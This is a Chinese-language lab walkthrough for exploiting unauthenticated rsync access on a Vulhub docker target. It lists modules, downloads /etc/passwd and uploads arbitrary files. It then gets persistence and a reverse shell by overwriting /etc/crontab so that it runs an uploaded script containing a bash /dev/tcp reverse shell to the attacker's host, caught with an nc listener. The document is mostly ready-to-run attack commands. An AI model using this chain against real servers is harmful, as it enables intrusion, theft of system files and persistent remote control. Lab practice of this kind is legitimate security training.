rsync(873)未授权访问
cd vulhub-master/rsync/common
docker -composeup -d
![](https://upload-images.jianshu.io/upload_images/4664072-a1ef3f4de4b0f89c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
检测
1.列出目标服务器的同步目录
rsync 192.168.244.129::
![](https://upload-images.jianshu.io/upload_images/4664072-f6159ef406508c16.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2.查看模块文件
rsync rsync://192.168.244.129/src
![](https://upload-images.jianshu.io/upload_images/4664072-c57440c9c12c74a3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3.下载文件
rsync -av 192.168.244.129::src/etc/passwd ./
//rsync -av ip::src/路径
![](https://upload-images.jianshu.io/upload_images/4664072-9b09b4d46e1b48e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
4.文件上传
rsync -av ceshi.sh rsync://192.168.244.129/src/tmp/ceshi.sh
![](https://upload-images.jianshu.io/upload_images/4664072-0218ccc071eca9d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
5.nmap探测
nmap -p 873 --script rsync-list-modules 192.168.244.129
![](https://upload-images.jianshu.io/upload_images/4664072-108096f217fea51f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
6.反弹shell
下载定时任务
rsync rsync://192.168.244.129:873/src/etc/crontab ./
![](https://upload-images.jianshu.io/upload_images/4664072-2648edbdfb60b4fc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
表示每小时的第17分钟执行run-parts --report /etc/cron.hourly
进行编辑crontab文件并保存退出(每隔1分钟运行一次脚本)
*/1 * * * * root /tmp/ceshi.sh
![](https://upload-images.jianshu.io/upload_images/4664072-323df40928341af2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
编写ceshi.sh文件
chmod 777
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.244.128/441 0>&1
上传ceshi.sh文件
rsync -av crontab 192.168.244.129::src/tmp/ceshi.sh
rsync -av ceshi.sh 192.168.244.129::src/etc/cron.hourly 每小时17分反弹的
![](https://upload-images.jianshu.io/upload_images/4664072-53301509ba129479.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
上传crontab文件
rsync -av crontab 192.168.244.129::src/etc/crontab
![](https://upload-images.jianshu.io/upload_images/4664072-610a99888c1c0696.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
开启监听
nc -lvvp 441
获取shell